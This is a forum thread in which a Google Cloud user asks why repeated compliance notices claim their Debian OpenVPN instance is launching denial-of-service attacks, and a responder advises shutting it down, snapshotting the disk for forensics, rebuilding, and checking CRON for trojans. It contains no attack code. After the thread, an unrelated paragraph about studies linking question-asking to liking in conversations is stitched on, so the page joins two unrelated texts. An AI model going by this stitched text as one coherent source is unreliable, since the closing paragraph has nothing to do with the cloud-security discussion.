Score:0

Repeated GCP Compliance Notifications

ng flag

I have been on GCP for roughly 3 months now. In that 3 months I have received 6 notices from GCP saying that one of my compute engines is creating a denial of service attack. They provide the IP address of the CE, and the time the attack triggered the compliance alert (which this last notice was 2021-11-25 00:10 to 2021-11-25 00:10).

I have taken as many steps as I can possibly take. I have 2 kinds of IDS software installed on the machine (neither have captured any attempts at compromise) and I have a local firewall on the server blocking all inbound and outbound traffic except for traffic specifically required. Additionally I have taken one last step and used the firewall on GCP to block all inbound and outbound traffic except for traffic specifically required.

I simply do not know where to go from here. It would seem as though these compliance notifications are meant to require me to purchase support so I can discuss this with GCP support staff. Does anyone else have any thoughts before I drop unknown $$$$ at support?

Thank you kindly...

John Hanley avatar
cn flag
1) Your first step is to shut down that system - e.g. do it right now. 2) Google will soon suspend that system and/or your account. I am surprised that your system has not already been terminated. 3) Create a snapshot of the disk drive(s), create a new system, and restore the snapshot as an additional disk. Perform forensics to figure out what is wrong. 4) It is unlikely that Google Support can help you. The actual forensics will need to be performed by you or a consultant that has access to the system. 5) If money is a concern, create a new system and reinstall your application.
ng flag
Hi John, I see your point. I'll go ahead and do that to see if anything changes. Having operated an investigation company performing computer forensics for several years. I am certain this machine is not performance any attacks. It's a Debian OpenVPN endpoint, that's its entire purpose. Nothing else has been installed on the machine. OS file hashes for network binaries match documented file hashes by Debian. It's just baffling that they continue to make these claims then 2 weeks later respond to my objection and tell me everything is fine. They're also never able to provide any details...
John Hanley avatar
cn flag
Difficult situation. You have both politics, policies, and technology at play. However, if Google decides your VM is a risk ... I would just create a new VM. Consider this disaster recovery practice for your backup procedures.
John Hanley avatar
cn flag
Note: In 100% of the cases I have been involved with (~20), Google was correct. There are a few brilliant hackers out there. Hint: double-check that a trojan is not being launched from CRON.
mangohost

Post an answer

Most people don’t grasp that asking a lot of questions unlocks learning and improves interpersonal bonding. In Alison’s studies, for example, though people could accurately recall how many questions had been asked in their conversations, they didn’t intuit the link between questions and liking. Across four studies, in which participants were engaged in conversations themselves or read transcripts of others’ conversations, people tended not to realize that question asking would influence—or had influenced—the level of amity between the conversationalists.